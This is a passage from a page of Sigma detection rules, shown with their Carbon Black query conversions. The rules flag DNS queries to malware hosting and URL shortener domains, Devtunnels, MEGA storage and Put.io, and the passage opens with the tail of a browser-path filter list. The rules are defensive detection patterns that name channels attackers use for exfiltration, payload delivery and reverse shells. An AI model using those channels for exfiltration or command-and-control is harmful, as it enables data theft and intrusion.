        Image|contains: '\AppData\Local\Vivaldi\'
        Image|endswith: '\vivaldi.exe'
    filter_optional_whale:
        Image|startswith:
            - 'C:\Program Files\Naver\Naver Whale\'
            - 'C:\Program Files (x86)\Naver\Naver Whale\'
        Image|endswith: '\whale.exe'
    filter_optional_tor:
        Image|contains: '\Tor Browser\'
    filter_optional_whaterfox:
        Image|startswith:
            - 'C:\Program Files\Waterfox\'
            - 'C:\Program Files (x86)\Waterfox\'
        Image|endswith: '\Waterfox.exe'
    filter_optional_midori:
        Image|contains: '\AppData\Local\Programs\midori-ng\'
        Image|endswith: '\Midori Next Generation.exe'
    filter_optional_slimbrowser:
        Image|startswith:
            - 'C:\Program Files\SlimBrowser\'
            - 'C:\Program Files (x86)\SlimBrowser\'
        Image|endswith: '\slimbrowser.exe'
    filter_optional_flock:
        Image|contains: '\AppData\Local\Flock\'
        Image|endswith: '\Flock.exe'
    filter_optional_phoebe:
        Image|contains: '\AppData\Local\Phoebe\'
        Image|endswith: '\Phoebe.exe'
    filter_optional_falkon:
        Image|startswith:
            - 'C:\Program Files\Falkon\'
            - 'C:\Program Files (x86)\Falkon\'
        Image|endswith: '\falkon.exe'
    filter_optional_avant:
        Image|startswith:
            - 'C:\Program Files (x86)\Avant Browser\'
            - 'C:\Program Files\Avant Browser\'
        Image|endswith: '\avant.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Likely with other browser software. Apply additional filters for any other browsers you might use.
level: medium

Convert to SIEM query

medium Moderate High FP

DNS Query To Common Malware Hosting and Shortener Services

Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners. These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc. Such DNS activity can indicate potential delivery or command-and-control communication attempts.

status experimental author Ahmed Nosir (@egycondor) ATT&CK sub-technique id f8c1e80b-c73a-476a-ae24-6c72528b1521

carbon_black query

QueryName:msapp.workers.dev* OR QueryName:trycloudflare.com* OR QueryName:infinityfreeapp.com* OR QueryName:my5353.com* OR QueryName:reurl.cc* OR QueryName:lihi.cc* OR QueryName:tinyurl.com*

view Sigma YAML

title: DNS Query To Common Malware Hosting and Shortener Services
id: f8c1e80b-c73a-476a-ae24-6c72528b1521
status: experimental
description: |
    Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.
    These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.
    Such DNS activity can indicate potential delivery or command-and-control communication attempts.
references:
    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics
author: Ahmed Nosir (@egycondor)
date: 2025-06-02
tags:
    - attack.command-and-control
    - attack.t1071.004
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|contains:
            - 'msapp.workers.dev'
            - 'trycloudflare.com'
            - 'infinityfreeapp.com'
            - 'my5353.com'
            - 'reurl.cc'
            - 'lihi.cc'
            - 'tinyurl.com'
    condition: selection
falsepositives:
    - Legitimate use of these services is possible but rare in enterprise environments
level: medium

Convert to SIEM query

medium Moderate High FP

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

status test author citron_ninja ATT&CK sub-technique id 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b

carbon_black query

QueryName:.devtunnels.ms

view Sigma YAML

title: DNS Query To Devtunnels Domain
id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b
related:
    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels
      type: similar
    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode
      type: similar
    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode
      type: similar
status: test
description: |
    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
references:
    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2
    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security
    - https://cydefops.com/devtunnels-unleashed
author: citron_ninja
date: 2023-10-25
modified: 2023-11-20
tags:
    - attack.command-and-control
    - attack.t1071.001
    - attack.t1572
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith: '.devtunnels.ms'
    condition: selection
falsepositives:
    - Legitimate use of Devtunnels will also trigger this.
level: medium

Convert to SIEM query

medium Moderate High FP

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to MEGA sharing website

status test author Aaron Greetham (@beardofbinary) - NCC Group ATT&CK sub-technique id 613c03ba-0779-4a53-8a1f-47f914a4ded3

carbon_black query

QueryName:userstorage.mega.co.nz*

view Sigma YAML

title: DNS Query To MEGA Hosting Website
id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
related:
    - id: 66474410-b883-415f-9f8d-75345a0a66a6
      type: similar
status: test
description: Detects DNS queries for subdomains related to MEGA sharing website
references:
    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
author: Aaron Greetham (@beardofbinary) - NCC Group
date: 2021-05-26
modified: 2023-09-18
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    product: windows
    category: dns_query
detection:
    selection:
        QueryName|contains: 'userstorage.mega.co.nz'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Mega
level: medium

Convert to SIEM query

medium Moderate Medium FP

DNS Query To MEGA Hosting Website - DNS Client

Detects DNS queries for subdomains related to MEGA sharing website

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 66474410-b883-415f-9f8d-75345a0a66a6

carbon_black query

EventID:3008 QueryName:userstorage.mega.co.nz*

view Sigma YAML

title: DNS Query To MEGA Hosting Website - DNS Client
id: 66474410-b883-415f-9f8d-75345a0a66a6
related:
    - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
      type: similar
status: test
description: Detects DNS queries for subdomains related to MEGA sharing website
references:
    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-16
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|contains: 'userstorage.mega.co.nz'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Mega
level: medium

Convert to SIEM query

medium Moderate Medium FP

DNS Query To Put.io - DNS Client

Detects DNS queries for subdomains related to "Put.io" sharing website.

status test author Omar Khaled (@beacon_exe) ATT&CK tactic-only id 8b69fd42-9dad-4674-abef-7fdef43ef92a

carbon_black query

EventID:3008 (QueryName:api.put.io* OR QueryName:upload.put.io*)

view Sigma YAML

title: DNS Query To Put.io - DNS Client
id: 8b69fd42-9dad-4674-abef-7fdef43ef92a
status: test
description: Detects DNS queries for subdomains related to "Put.io" sharing website.
references:
    - https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure
author: Omar Khaled (@beacon_exe)
date: 2024-08-23
tags:
    - attack.command-and-control
logsource:
    product: windows
    service: dns-client
    definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
detection:
    selection:
        EventID: 3008
        QueryName|contains:
            - 'api.put.io'
            - 'upload.put.io'
    condition: selection
falsepositives:
    - Legitimate DNS queries and usage of Put.io
level: medium

Convert to SIEM query

VMware Carbon Black

Detection rules